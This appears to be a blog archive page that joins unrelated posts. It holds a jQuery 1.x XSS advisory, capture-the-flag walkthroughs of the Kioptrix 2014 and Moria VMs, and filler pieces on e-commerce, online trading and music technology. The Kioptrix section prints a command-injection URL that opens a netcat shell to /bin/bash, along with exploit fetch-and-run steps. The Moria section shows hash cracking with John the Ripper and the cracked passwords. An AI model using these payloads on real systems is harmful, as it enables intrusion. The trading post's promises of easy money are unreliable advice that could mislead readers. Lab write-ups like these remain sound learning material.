A jQuery 1.x vulnerability exists and no fix is planned

I haven’t seen much talk about this issue around the Internet, so I thought I’d present what I’ve learned for others to be aware of. It mainly has to do with the fact that jQuery 1.x (and 2.x, for that matter) were replaced by 3.x, yet they are still thriving in many, many projects, applications, and websites to this day.

While doing a security review of some code the other day, a retirejs scan informed me that jQuery 1.x contained a Medium vulnerability regarding cross-domain requests in ajax. According to Snyk:

“Affected versions of the package are vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain ajax request is performed without the dataType option causing text/javascript responses to be executed.

Remediation: Upgrade jquery to version 3.0.0 or higher.”

“Upgrading to 3.0.0 or higher seems pretty drastic,” I thought to myself. Well, according to a comment I found on jQuery’s GitHub page, this is actually their stance, and they don’t plan on patching 1.x because it is a ‘breaking change’:


So it would behoove you to upgrade to jQuery 3 if you don’t want to be susceptible to this vulnerability. The magnitude of that may seem rather staggering if you consider all the projects across just about everything (WordPress plugins, Drupal modules, etc etc) that bundle the 1.x version of jQuery, and haven’t updated it in years.

While the vulnerability may not be relevant if you are not making cross-domain ajax calls, this is but one risk that has come to light for which there will be no fix. And it’s not exactly reasonable to assume that developers know they need to avoid that if they intend to use jQuery 1.x.

The longer jQuery 1.x sits in your project, the higher a risk it becomes.

As the impending OWASP Top-10 for 2017 says, “Applications and APIs using components with known
vulnerabilities may undermine application defenses and enable various attacks and impacts.”

Long story short: Keep your bundled libraries up to date!

Kioptrix 1.4 (VM 5) Walkthrough

This evening I am finally catching up on write-ups of the Virtual Machine penetration testing (and subsequent pwnage) I have been working on. This is the second one I finished up and got ready to share, in case anyone finds it useful. The Kioptrix series of VMs are available on vulnhub.com, and you can download them to practice your hacking skills with at any time, for free.

Having already conquered the preceding 4 Kioptrix VMs, I started this one a while ago, but I hadn’t circled back to finish it. I figured it was time to complete the last of the Kioptrix boot2root challenges. This one was difficult!


netdiscover turned up as the IP for this target VM.

On port 80, just a default Apache “It works!” message, and 8080 is a forbidden 403 message. Worth noting that for later.


Summary of Interesting finds:
OpenSSL exploit
Older Apache
Older PHP

Finding Directories


Turned up index.html (nothing new) and cgi-bin. Blah.


Tried various wordlists. Nothing turned up with this either.

mod_ssl vulnerability

Nikto did mention this vulnerability, so I took a deeper dive:

This is that same old OpenFuck vuln I ran into in Kioptrix 1.1. I was unable to get it to compile then, so I didn’t feel like wasting time on it now.

Source Code to a PHP app

Failing to ever look at the source code of the Apache “It Works!” default page, I kicked myself when I realized I hadn’t done that. In the source code was a handy comment:

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

Appending pChart2.1.3/index.php to the URL got me to some crappy PHP app:

The app looks like it would have a load of issues based on what it does and how it does it. An Exploit DB search reveals it does:


Directory Traversal sounds useful!

Using the exploit at Exploit DB, I found /etc/passwd:

Poking Around

I was unable to turn up anything useful in any of the /etc directory files I was able to look at. I started looking up the locations of things in freebsd, since they were likely different than most Linux distros I am used to.

That said, I thought that the Apache config file would be a good place to start, as it might illumincate additional info such as usernames, or locations of password files. I might also find out if anything else is hidden on the website.

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:

I had to figure out that the x in that path should be a 2, since this server is running Apache 2.2

So that worked:

So what was relevant in the httpd.conf file?

Listen 80
Listen 8080

I already knew 80 was listening, and 8080 was reported as open but returning a 403 when trying to visit it in a web browser.

DocumentRoot “/usr/local/www/apache22/data”

That’s where files are served from in Apache on freebsd, apparently.

This VirtualHost section looked interesting, as it explained the 403 errors I was getting when visiting the :8080 port

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

So the :8080 virtual host is guarded by requiring a specific browser User-Agent string. Time to install User Agent Switcher add-on for Firefox. I prefer the one by Chris Pederick.

A Mozilla 4.0 browser is actually Internet Explorer 6, so I set my User Agent to be IE6, then I was able to get to the :8080 page:

Clicking that led me to yet another crappy PHP app!

Attacking the PHPTAX app

This app smelled like it was choc-full of fun exploits. A quick Google search revealed exactly that.


This will start a netcat reverse shell by injecting the command via the URL:;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Trying to set up a netcat listener using various methods wasn’t working. I tried various ports and different things from the exploit-db entry (the other URL they mentioned), but had no luck.

Was there already an exploit in Metasploit?

That would be a “yes.” I thought doing it by hand would be more noble and educational, but alas, that proved to be untrue. Except that I learned I was down a rabbit hole. Off to metasploit I went…

That worked pretty well, and I found myself with a command shell.

Looks like I was the www user/group. I set out to escalate them privileges. Looking around for quite some time, I didn’t find anything too great. So I started with looking into OS/Kernel vulnerabilities.

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

FreeBSD 9.0 seemed pretty old. A couple of promising leads turned up when looking for exploits:

Privilege Escalation

So I had 2 exploits to work with, just needed a place I could write files. Turns out the original web directory I was in when I got the reverse shell was perfect:


touch me
cat me

Next, I needed to get the exploit file over to the target machine. I wasn’t sure how to do this, so I Googled it. This helped: https://netsec.ws/?p=292. Or so I thought. I couldn’t get it transferred with netcat and I’m still not sure why.

More Googling led me to ‘fetch’ which is installed on the FreeBSD machine.

So I set up a quick web server to serve up the exploit file from my Kali box using Python. From the directory where the exploit file (26368.c) resides:

python -m SimpleHTTPServer 80

Then from the reverse shell on the target machine, fetch the file:


Compile that sucker:

gcc 26368.c

Then run it:



And the flag is in /root/congrats.txt

You should read the congrats.txt file and look into what it says, if you made it this far. There are some opportunities to learn about what you just did in there!

Moria: A Boot2Root VM Walkthrough

Moria is a relatively new boot2root VM created by Abatchy, and is considered an “intermediate to hard” level challenge. I wasn’t sure I was up for it since I’ve only been doing this for a few months, but much to my delight I conquered this VM and learned a lot in the process. This experience will certainly help as I prepare for the OSCP certification.

While Abatchy says, “No LOTR knowledge is required ;),” I found that my LOTR knowledge came in quite handy.

Getting Started

My setup:

  • MacBook running MacOS (Sierra)
  • VMWare Fusion running:
  • Kali Linux (latest)
  • Moria VM

Once the VM was downloaded and running in VMWare, I started through various enumeration techniques that I typically go through when starting to penetration test a box. I’ll omit the irrelevant ones in this write-up.



This tool revealed the IP of this machine on my network:


I used nmap -v -sS -A -T4
and nmap –sS –sV -O

21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:E8:75:4F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X

So HTTP, FTP, and SSH were running. I started by checking out HTTP and visiting in a web browser. Here’s what I got:

The image of the West Door of Moria is from LOTR. This door was a trick door in the book and movies, and it required some “outside the box” thinking in order to gain entry. I remembered this from the books, and re-familiarized myself with the details via a Google search:

From http://tolkiengateway.net/wiki/Doors_of_Durin:

“On 13 January 3019 the Fellowship of the Ring entered Moria through the Doors,[5] but initially Gandalf could not find out the password to open them. Merry Brandybuck unknowingly gave Gandalf the answer by asking, “What does it mean by speak, friend, and enter?” When Gandalf realized that the correct translation was “Say friend and enter” he sprang up, laughed, and said “Mellon”, which means “friend” in Sindarin, and the Doors opened. Shortly thereafter, the Watcher in the Water attacked the Fellowship and shut the Doors behind them.[1]”

Good info that might come in handy later 😉


Running dirb led to the discovery of a directory at It contained a link to /h/, and so on. Traversing down the links led to:

The page said “Knock knock”
Was this a reference to port knocking? I thought that might be worth checking out later if I could find more info about a sequence.

At this time I was unable to find much more to work with related to the website and HTTP. The usual nikto and other apache/web-related stuff didn’t turn much up. I turned to FTP.


Trying to connect via FTP turned up some interesting info:

220 Welcome Balrog!

Clearly, the Lord of the Rings theme was running deep. I wondered if the password would be “mellon,” since that was what got the LOTR party into the gates of Moria. I couldn’t get that to work, and I wasn’t sure about a username.

Revisiting the website

Poking around the website some more, I DISCOVERED SOMETHING IMPORTANT!!!
When I browsed to
It gave me something different the next time. I found that a different quote would appear with each page load. I kept refreshing and collected all of the following:

Knock Knock
Is this the end?
Too loud!
Dain:”Is that human deaf? Why is it not listening?”
Nain:”Will the human get the message?”
Is this the end?
“We will die here..”
Ori:”Will anyone hear us?”
Nain:”Will the human get the message?”
Telchar to Thrain:”That human is slow, don’t give up yet”
Maeglin:”The Balrog is not around, hurry!”
Balin: “Be quiet, the Balrog will hear you!”
Oin:”Stop knocking!”
“Eru! Save us!”

A couple of weeks passed at this point, as I went out of town and had other things going on, but it gave me an opportunity to think about Moria and to come back with a fresh perspective.


Tried a bunch of other things, but finally tried doing SSH to the server and was prompted for a login.
Based on the FTP connection saying “Welcome Balrog!” I assumed that Balrog was a username. I also assumed that Mellon was the password knowing what I know about the LOTR story. Lastly, I realized I probably needed to try various capitalizations.

Using the login combo of Balrog / Mellon I got this:


Wrong gate? OK. I went back to try FTP with the Balrog/Mellon auth combo and got in:

Silly me. The username was right there in front of me when I had been trying FTP before. Nothing in the directory I logged into turned up, but I was able to cd .. up to /

I could go many places with basic dir navigation, but much was not allowed. For example, could get into /etc but not look at passwd. I couldn’t find anywhere that I could upload anything, and none of the important system files you’d typically check were allowed to be viewed.

I went to /var/www/html and found a directory that dirb would never have discovered:

Viewing that page in my web browser showed a handy table of what appeared to be hashes:


I set off to see what those passkeys could do. They did’t seem to work as-is for SSH or FTP, so I knew they’d need to be operated on somehow.

hash-identifier said they were likely MD5 hashes:

Without a salt I wasn’t sure how I’d use that information.

I tried various things with Hashcat and John the Ripper, but had no luck. I was stumped for a while until I looked under the hood at the source code of that page at

Note: Looking at the HTML source code is something I always forget to do, and it has bitten me more than once!

At the bottom of the source code I found what appeared to be the salts:


So I had the salts for those MD5 hashes, and I had what looked like the format for using them:



This next part took me a lot of reading and learning, as I’d never really run into this before in my rather limited experience, and I had only a basic knowledge of Hashcat and John the Ripper. While it took some time, it turned out to be a great opportunity to learn.

Ultimately, based on what I had read in various seedy places of the Internet’s underbelly, I created a file called hashes.txt with these contents, based on the HTML chart found above, and added the salts to each line (after the $) respectively:


I still needed to figure out the right format for running through John the Ripper though, so more research was needed. I turned to these places:

http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats – not much help here.
https://github.com/piyushcse29/john-the-ripper/blob/master/doc/DYNAMIC – found the solution here.

Based on the chart on the documentation page for DYNAMIC, the format mentioned in the source code would work with this:

dynamic_6 | md5(md5($p).$s)

I next tried that on the hashes.txt file:

root@kali:~/moria# john –format=dynamic_6 hashes.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4×3])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
magic (Telchar)
abcdef (Dain)
spanky (Ori)
fuckoff (Maeglin)
flower (Balin)
rainbow (Oin)
darkness (Thrain)
hunter2 (Fundin)


I had a list of passwords for each user. Only one of these worked for logging in via SSH, and that was Ori’s account.

Bash Shell Obtained

Got a Bash shell with Ori’s login via SSH:


-bash-4.2$ ls -al
total 8
drwx—— 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x—. 4 root notBalrog 32 Mar 14 00:36 ..
-rw——- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
-rw-r–r– 1 root root 225 Mar 13 23:53 poem.txt
drwx—— 2 Ori notBalrog 57 Mar 12 22:57 .ssh

Starting in Ori’s home directory, I checked out the .ssh directory to see what might be relevant.

It looked like Ori had logged into localhost before, since it showed up as a known_host. Why would he be doing that unless he needed to log in as someone else? Perhaps as root?

root Obtained – All That is Gold Does Not Glitter

Huh…well that last part was easier than I thought it might be. Thanks to Abatchy for providing this challenge. I learned a lot!


A Guide To Running An E-Commerce Business

Since the internet was invented in the early 1990s by the British computer scientist Tim Berners-Lee, it has changed the way that the world operates. For one, it is a democratizing force. The Arab Spring of 2010 was enabled in part by the fact that the protesters involved were able to communicate with each other on their phones. The internet has also allowed for more people to educate themselves. Sites like Open Culture believe that the Internet is able to act as a tool to proliferate information, university courses and art and literary criticism for people who may otherwise not have access to these things. It allows for all sorts of conversations to take place between people who may not otherwise have been able to communicate. One of the potential problems with this, however, is that the internet facilitates niche communities to exist. If a person only reads certain websites they can find themselves in a sort of digital echo chamber where their own opinions, thoughts and arguments are repeated back to them and are therefore validated and encouraged. Whether this sort of thinking has led to a greater degree of partisanship in our online and social discourse is debatable. On a personal level, the internet has changed things too. Facebook now has an estimated 1.9 billion unique monthly users and has enabled people to make new friends, and form new romantic relationships while also resurrecting old ones. It is also cited in a third of divorces today, so it is not all good.

However, as a potential business opportunity, it is unparalleled. The global e-commerce market is thought to be worth about $22 trillion with m-commerce (transactions that take place on mobile devices) being worth an estimated $3.2 trillion. Remarkably, amongst small businesses in 2016, 46% did not have a website. Of the 54% which did, 23% of those websites were not mobile friendly. These statistics reveal that a lot of people have still not realized the potential of the internet as a tool for running a business. The reality of the modern world is that if someone needs information, they will likely turn to Google. The prevalence of phonebooks or business directories has steadily declined for exactly this reason. Not having a website is therefore to condemn yourself to only being able to do business with customers who are in your geographic vicinity. If you live in a major city, that still may be millions of people, but with 3.7 billion people now having access to the internet, there really is no reason not to embrace the digital revolution. Besides, the internet is also a great marketing tool.

The infrastructure of online commerce is such that if you are smart, you can easily advertise your business for a fraction of the cost that it would ordinarily cost. For example, with sites like Facebook, Twitter, and Instagram, if you manage to produce viral content, you can reach millions of people within a few hours. Besides, the cost of using these websites to promote yourself or your business is nothing. The only problem is that everyone else is trying to capture the zeitgeist too so it can sometimes be a rather crowded market. It is especially important when you are advertising online to be sensitive to the cultural considerations of the people who may see it. With the internet, that is people from nearly every country on earth. It can often be quite expensive to plan, create and launch an advertising campaign and if it is not successful, that money will be wasted. The recent Pepsi commercial featuring Kendall Jenner created a backlash because it was thought to co-opt and infantilize a political struggle that is real to a lot of marginalized people. Using that to sell your products is rather distasteful anyway, but it is especially embarrassing when the corporate desire to fit in and appeal to young people is so blatant and unsophisticated. There are so many examples of international marketing campaigns that were not cognizant enough of the cultures in which they wished to expand. However, being sensitive to these things is not just a moral issue, it could help prevent you losing the potential revenue of massive markets around the world.

There are particular benefits to running an online only business though. First, with retail companies, in particular, there are a lot of serious expenses that have to be met in order to start trading. Opening a brick and mortar store is expensive because the store itself needs to be designed in such a way that it is appealing to the customers as well as safe and compliant with lots of different health and safety codes. There is then the issue of hiring friendly, competent staff that have a working knowledge of the products and also how to deal with customers. The cost of a warehouse for stock is also important. When you run an online store, you will still need a warehouse, but you can save lots of money on running an actual store. Your overheads will be a lot lower, and you will, therefore, be able to sell your products for reduced prices as well. One of the costs that online businesses have to worry about though is the sometimes startling prices of shipping products to customers. While most online purchases come with a shipping fee, they do not always cover the entire cost of sending the package, especially if it is an international delivery so the e-commerce company will have to subsidize part of the transaction. They obviously consider this a feasible option because they anticipate future business with the customer. However, this is not something on which you can always rely.

There are particular security issues of which you need to be aware as well. When a customer inputs their sensitive financial information into the payment gateway on your website, they are taking a risk. The threat of non-ethical hackers compromising your computer systems and stealing that information is real. In fact, it has happened to a lot of major companies. It is serious because this sort of thing can completely ruin your reputation with your customers. If they cannot trust you with their sensitive information, they simply will not shop with you. If you fail to put the necessary measures in place to protect yourself against this sort of threat, you may find that you face legal problems. It is your ethical responsibility to protect this information. However, it is not always just outside forces which you should protect yourself against. A poll conducted in 2011 found that 60% of people steal from a company that they are leaving. 65% stole email lists, 45% took non-financial business information, 39% took customer contact details, 35% took employee records, and 19% were bold enough to steal financial information. These are corporate crimes, and if you think you were the subject of fraud, you should consider speaking to a whistleblower attorney. Setting a precedent and clearly demonstrating that you do not condone such behavior is important, but you should also be aware that losing this information can seriously affect how well you are able to compete with other businesses. You have legal recourses which you should use.

Finally, whatever you choose to sell, you need to make your products unique. People can often be indecisive when they are working around a mall because there are so many different products available to them. However, when it comes to the internet, there are many more. Managing to stand out in this environment is not easy, but it can be immensely profitable, a fact demonstrated by the CEO of Amazon Jeff Bezos now being worth an estimated $84 billion.

4 Compelling Reasons You Should Start Trading Online

The internet is home to so many weird and wonderful things. No matter where you click, you’re bound to find something of interest.

If you surf the web for long enough, you may stumble across the online trading scene. This is often known as online investing, and is a popular way for many people to invest their spare cash. It follow a similar process to regular investing, the main difference is that everything is done via the internet.

What we want to discuss today is why you should consider trading online. I’ve put together four compelling reasons that will show you why it’s such a good idea:

You Can Trade So Many Different Things

One of the best things about trading online is that you can invest and trade so many different things. You’re really not limited by anything, if you can think about it, you can trade it. Of course, there are all the usual suspects that most people think about what they consider trading. You can trade stocks online, you can dabble in forex trading, and many more traditional methods.

As well as all this, you can invest in many other things too. Bitcoin is a very popular online investment and something you can trade. As you’ll note from this Coinbase review, bitcoin has increased in value quite a bit over the years and continues to do so. This makes it a great thing to trade as the opportunity for making money is increased. Overall, the fact you have so many options to choose from makes online trading a very promising prospect. With so many different things, you can dabble in multiple trades and make even more money.

There Are Loads Of Platforms To Help You

Another compelling reason to start trading online is that there are loads of platforms out there to help you get started. A trading platform is essentially a website that lets you buy and sell different assets. It doesn’t matter what you’re interested in trading, it could be stocks, forex, indices, bitcoin – there’s always a platform out there that you can use.

These platforms are designed to help you buy and sell whatever it is you’re trading. It brings the market to your computer, meaning you can trade things from all over the world. Everything is very simple thanks to the platforms at your disposal. It certainly makes trading more accessible, as you don’t need to go to a stock exchange, and you don’t need to hire a broker. Some platforms come with online or automated brokers that can help you find the best trades too,; it’s a win-win situation!

You Don’t Have To Leave Your Bedroom

Is there a better reason to start online trading other than the fact you don’t have to leave your bedroom? You can literally wake up, get your laptop, and start trading without getting out of bed. It’s incredibly simple and requires very little effort on your behalf. As mentioned before, you don’t have to go to a stock exchange or anything complicated like that. Just trade from your bedroom!

Likewise, you can also trade from anywhere in the world. If you’re on holiday, you can still fire up your laptop or mobile phone and make some trades.

You Can Earn A Lot Of Money

If you’ve read the previous three reasons and are still on the fence, this reason will tip you over and help make up your mind. The simple fact is, you can earn a lot of money when trading online. It allows you to constantly stay in the loop and make trades whenever you want, wherever you are. As a result, you could sell something at the right time to make loads of cash, or buy something at the right moment to get a real cheap investment.

You don’t have to be extremely active and buy/sell like crazy every day either. You can invest and then sell at a much later date if that’s how you prefer to trade as well. If you want to earn some extra money on the side, this is a really great way to do so. Online trading can help you turn your savings into something far more substantial.

These four reasons prove why you should consider trading online. It’s a very smart thing to do and a great way to spend your free time. Plus, it’s so easily accessible, and there are so many options to choose from. If you’re looking to do something with some extra cash, you may as well invest it online!

How Technology Has Changed Music

Whenever you switched on the radio as a kid, you’d have to fiddle with the signal and the aerial to get a clear sound on the songs being played by your favourite radio station. The strength of the signal used to vary from room to room in the house, but thanks to the developing world of technology, music has changed dramatically.

Long gone are the days of cassette tapes and scratchy record players. Audio technology is constantly evolving and as yet, hasn’t reached a peak! There’s always been changes in music, and it’s not just that the popularity of rap and grime music has overtaken traditional bands. We’re going to look at the ways that technology has helped music to evolve over the last few decades, so that you can see why our world is a better place with technology on our side:

  • Production. Music has so much gadgetry involved, from synthesizers that use a high frequency oscillator to DAWs and social media streaming services. The current technology in music has made it much easier for individual musicians to produce their own music, whereas before they would have needed a production company on their side to get it all done. People demand music right now, so waiting for a release date for a physical album has become a thing of the past. Home studios of a professional quality are so much easier to set up than ever before, changing the whole face of production.
  • Profit. Due to the change in the way music is being produced, music production companies are now challenged in how they make their profit. The physical records and CDs you used to see in the shops all the time has upgraded to online streaming, with downloadable music now banking more in sales than ever before.
  • Instruments. There used to be a time where being in a band meant everyone had a role and instrument to use and others would sing along. Now, technology and music programs have made it easier for people to make music from a computer, overlaying instrumentals and beats with vocals. It makes it possible that one person can now play the music of a whole band. For some, this has ruined traditional music, and for others it has allowed them a new way of getting their sound into the world.
  • Correction. One of the most popular reason to own records is to hear the scratches and tiny imperfections in the songs. With the invention of MIDI, there’s no such thing as imperfections. Music and voice can be corrected with the touch of a button, changing someone with the right look and the wrong voice into someone with an angelic singing ability.
  • Sound. The last, and probably biggest change to music has been the ability to create new sounds not heard before. Laying music over beats that couldn’t be reproduced without an orchestra means a whole new world of music is opened up. It’s so much easier to be creative with music, with technology on your side.